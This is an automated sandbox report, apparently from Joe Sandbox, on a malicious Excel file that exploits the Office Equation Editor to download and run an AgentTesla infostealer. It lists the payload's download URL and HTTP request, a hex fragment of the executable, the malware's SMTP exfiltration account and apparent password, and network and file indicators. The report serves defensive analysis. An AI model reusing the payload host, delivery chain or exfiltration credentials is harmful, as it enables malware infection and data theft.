Analysis Report PAGO.xlsx

ID:	383929
Product:	CloudBasic
Start time:	12:39:17
Start date:	08.04.2021
Sample:	PAGO.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	db190ad25a453084bc89ecb5d46d6e0a
SHA1:	999aacfcfee17aaa6231cf858af787d5ddce8774
SHA256:	4273c2c75793063754de785ea06da2e149f8e659db159e94e73be5b23abdd3a7
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	F31B0E7D038ED9D64BE2C6EF94FA5171	A4311EA256FB28FA7815249F43C903641C7114DA	30865D42D9897A6611DF8683BC041836794CF6D7EE47763281FBED0F063A7C8E
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3F6ihf[1].htm	ASCII text, with CRLF line terminators	FDA44910DEB1A460BE4AC5D56D61D837	F6D0C643351580307B2EAA6A7560E76965496BC7	933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1015AEA3.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3	E8FC908D33C78AAAD1D06E865FC9F9B0	72CA86D260330FC32246D28349C07933E427065D	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2EF57FF8.png	PNG image data, 992 x 192, 8-bit/color RGBA, non-interlaced	FE450E7017E0F21A25701C4ABC68021B	06090A749D7077371AFBB5DC698C60FE861B676E	B3A9530ADB5B09DCC14E71AD9AF5421BB2F0D95CEB93E41A2C053B77E48C7FCB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\41D443A9.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 178x124, frames 3	BBACB9E08630847C0E6E84B5100C40C3	FDE4F15306F56139583ECB5E0EC99884A3F32371	79505C5789C409D74A5F6C7D81C01DADBA9C7E80C7F7A6985CE5367C6FED2D2E
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4890E2DA.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 88x89, frames 3	B6EE1614D1302AD75B751F7134E57AA8	CD0071E2B61C622CFA38FACE83826A42CD6F7116	6D90BF5FE7C4F0C03F0FAFA9EBCBDEAE938F8AA77829F448645AA51EEAE9D986
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B3408F0.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	737130889222DA6A24DB863283F9AA2B	91A31F3169BCDC0CBFC1F47E75AABDA68C764DA0	7B23C702859098656105259373C4A99936AEFF58064521496320532F23BE4772
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E7712AA.png	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced	8C29CF033A1357A8DE6BF1FC4D0B2354	85B228BBC80DC60D40F4D3473E10B742E7B9039E	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\696809D7.png	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced	16925690E9B366EA60B610F517789AF1	9F3FE15AE44644F9ED8C2CA668B7020DF726426B	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CA41431.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	82550B3A28A0D1C1AD06AEF24EE0515D	8F9CCD7419EF634E9C0479C51ECD841B4527EB3A	25E0551B553056F7B434BB533563116CB8E59620A629EDB898B3B457C1EFC3A0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\715928FD.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3	E8FC908D33C78AAAD1D06E865FC9F9B0	72CA86D260330FC32246D28349C07933E427065D	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\806800C6.jpeg	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3	AA7A56E6A97FFA9390DA10A2EC0C5805	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8299D048.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 88x89, frames 3	B6EE1614D1302AD75B751F7134E57AA8	CD0071E2B61C622CFA38FACE83826A42CD6F7116	6D90BF5FE7C4F0C03F0FAFA9EBCBDEAE938F8AA77829F448645AA51EEAE9D986
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84B2BE14.jpeg	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3	AA7A56E6A97FFA9390DA10A2EC0C5805	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\863DC596.png	PNG image data, 992 x 192, 8-bit/color RGBA, non-interlaced	FE450E7017E0F21A25701C4ABC68021B	06090A749D7077371AFBB5DC698C60FE861B676E	B3A9530ADB5B09DCC14E71AD9AF5421BB2F0D95CEB93E41A2C053B77E48C7FCB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91086113.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 178x124, frames 3	BBACB9E08630847C0E6E84B5100C40C3	FDE4F15306F56139583ECB5E0EC99884A3F32371	79505C5789C409D74A5F6C7D81C01DADBA9C7E80C7F7A6985CE5367C6FED2D2E
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A1EB740D.png	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced	16925690E9B366EA60B610F517789AF1	9F3FE15AE44644F9ED8C2CA668B7020DF726426B	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2AC4F99.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B982CC9F.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C43329EC.png	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced	8C29CF033A1357A8DE6BF1FC4D0B2354	85B228BBC80DC60D40F4D3473E10B742E7B9039E	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD298C7E.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	0BE8521EC30BD162F021BD7E346B2469	12CFE6A40DDC1ED2C923115470A4FC6C390FD6CD	66A1AE17856C8DE3DDD46040052DDE5EF9214548BB74E103856D2FDB6224EACD
C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd	data	E8F178E7287D2141385C4C189AAFB00C	8C32B4818B3D1C2E64B232C782C65511C1E69F10	0AF00FD1025E42AB16E54251F13AB527083B32221699E3B5AED0E9C862A000DC
C:\Users\user\Desktop\~$PAGO.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	F31B0E7D038ED9D64BE2C6EF94FA5171	A4311EA256FB28FA7815249F43C903641C7114DA	30865D42D9897A6611DF8683BC041836794CF6D7EE47763281FBED0F063A7C8E

AV Detection:

Antivirus detection for URL or domain

Source: http://wsdysuresbonescagegp.dns.army/documenpt/svchost.exe

Avira URL Cloud: Label: malware

Found malware configuration

Source: 5.2.vbc.exe.400000.1.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "helio@lpsinvest.comz6~Rhjss*B0}smtp.lpsinvest.com"}

Multi AV Scanner detection for domain / URL

Source: wsdysuresbonescagegp.dns.army

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe	ReversingLabs: Detection: 16%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 16%

Multi AV Scanner detection for submitted file

Source: PAGO.xlsx	Virustotal: Detection: 33%			Perma Link
Source: PAGO.xlsx	ReversingLabs: Detection: 33%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.22:49165 version: TLS 1.2

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		4_2_005D6498
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		4_2_005D6488
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		4_2_005D6358
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		4_2_005D6368

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: is.gd

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 104.25.234.53:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 104.25.234.53:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49166 -> 103.153.76.181:80

Connects to a URL shortener service

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

DNS query: name: is.gd

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 5.10.29.169:587

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Apr 2021 10:40:38 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34Last-Modified: Thu, 08 Apr 2021 07:36:25 GMTETag: "dde00-5bf711ad4360e"Accept-Ranges: bytesContent-Length: 908800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 79 b2 6e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 96 0a 00 00 46 03 00 00 00 00 00 9a b4 0a 00 00 20 00 00 00 c0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 b4 0a 00 4f 00 00 00 00 c0 0a 00 34 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 94 0a 00 00 20 00 00 00 96 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 34 42 03 00 00 c0 0a 00 00 44 03 00 00 98 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0e 00 00 02 00 00 00 dc 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c b4 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 80 3f 00 00 60 48 00 00 03 00 00 00 01 00 00 06 e0 87 00 00 68 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1f 00 00 0a 28 20 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 21 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 22 00 00 0a 00 02 16 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 16 28 26 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 6c 00 00 06 28 27 00 00 0a 00 2a 26 00 02 28 28 00 00 0a 00 2a ce 73 29 00 00 0a 80 01 00 00 04 73 2a 00 00 0a 80 02 00 00 04 73 2b 00 00 0a 80 03 00 00 04 73 2c 00 00 0a 80 04 00 00 04 73 2d 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 31 00 00 0a 0

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 5.10.29.169 5.10.29.169
Source: Joe Sandbox View	IP Address: 104.25.234.53 104.25.234.53
Source: Joe Sandbox View	IP Address: 103.153.76.181 103.153.76.181

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: EVEREST-ASGB EVEREST-ASGB
Source: Joe Sandbox View	ASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 5.10.29.169:587

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /documenpt/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: wsdysuresbonescagegp.dns.army

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B3408F0.emf

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /documenpt/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: wsdysuresbonescagegp.dns.army

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: is.gd

URLs found in memory or binary data

Source: vbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmp	String found in binary or memory: http://AFplKq.com
Source: vbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.2370796460.0000000005E70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2169807116.00000000024B8000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2369177054.00000000026F4000.00000004.00000001.sdmp	String found in binary or memory: http://smtp.lpsinvest.com
Source: vbc.exe, 00000005.00000002.2370796460.0000000005E70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000005.00000002.2369077883.0000000002636000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%
Source: vbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: vbc.exe, vbc.exe, 00000005.00000002.2368916069.0000000000F82000.00000020.00020000.sdmp, svchost[1].exe.2.dr	String found in binary or memory: https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
Source: vbc.exe, svchost[1].exe.2.dr	String found in binary or memory: https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zip
Source: vbc.exe, vbc.exe, 00000005.00000002.2368916069.0000000000F82000.00000020.00020000.sdmp, svchost[1].exe.2.dr	String found in binary or memory: https://github.com/d-haxton/HaxtonBot/archive/master.zip
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: vbc.exe, 00000004.00000002.2170048529.000000000347C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2368346824.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: vbc.exe, 00000005.00000002.2369104904.0000000002658000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2369171386.00000000026EC000.00000004.00000001.sdmp	String found in binary or memory: https://x8nMk45g8ETcNqX.org

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.22:49165 version: TLS 1.2

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe

Code function: 4_2_002D5424 NtQueryInformationProcess,

4_2_002D5424

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00F82050		4_2_00F82050
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00F846E0		4_2_00F846E0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D0288		4_2_002D0288
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D6290		4_2_002D6290
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D83D8		4_2_002D83D8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D240B		4_2_002D240B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D74D9		4_2_002D74D9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D5690		4_2_002D5690
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D27D8		4_2_002D27D8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D39C1		4_2_002D39C1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D6AB8		4_2_002D6AB8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002DAAF9		4_2_002DAAF9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D3DA0		4_2_002D3DA0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002DE068		4_2_002DE068
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002DA149		4_2_002DA149
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D92B0		4_2_002D92B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D92C0		4_2_002D92C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D7340		4_2_002D7340
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002DB5B8		4_2_002DB5B8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002DE688		4_2_002DE688
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002DA6D8		4_2_002DA6D8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D27C8		4_2_002D27C8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002DA93E		4_2_002DA93E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002DA908		4_2_002DA908
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002DA918		4_2_002DA918
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002DED50		4_2_002DED50
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D0E20		4_2_002D0E20
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D9E84		4_2_002D9E84
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D6F84		4_2_002D6F84
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D0968		4_2_005D0968
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D0C6B		4_2_005D0C6B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D0900		4_2_005D0900
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D4D28		4_2_005D4D28
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D15F8		4_2_005D15F8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D15E9		4_2_005D15E9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D2990		4_2_005D2990
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D1DA8		4_2_005D1DA8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D49A1		4_2_005D49A1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D1AF0		4_2_005D1AF0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D4EE7		4_2_005D4EE7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D1AE0		4_2_005D1AE0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005D4F33		4_2_005D4F33
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00F82050		5_2_00F82050
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00F846E0		5_2_00F846E0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_002E5320		5_2_002E5320
Source: C:\Users\Public\vbc.exe	Code function: 5_2_002E6340		5_2_002E6340
Source: C:\Users\Public\vbc.exe	Code function: 5_2_002EB418		5_2_002EB418
Source: C:\Users\Public\vbc.exe	Code function: 5_2_002E5668		5_2_002E5668
Source: C:\Users\Public\vbc.exe	Code function: 5_2_002E2087		5_2_002E2087
Source: C:\Users\Public\vbc.exe	Code function: 5_2_002EE5B0		5_2_002EE5B0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_002EE610		5_2_002EE610
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00786928		5_2_00786928
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007805B8		5_2_007805B8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007871A8		5_2_007871A8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00787EB8		5_2_00787EB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0078B298		5_2_0078B298
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0078B868		5_2_0078B868
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00782910		5_2_00782910
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00785380		5_2_00785380
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00DF0048		5_2_00DF0048

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: PAGO.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

PE file contains strange resources

Source: svchost[1].exe.2.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: svchost[1].exe.2.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Classification label

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/24@5/3

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$PAGO.xlsx

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE0FB.tmp

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Queries process information (via WMI, Win32_Process)

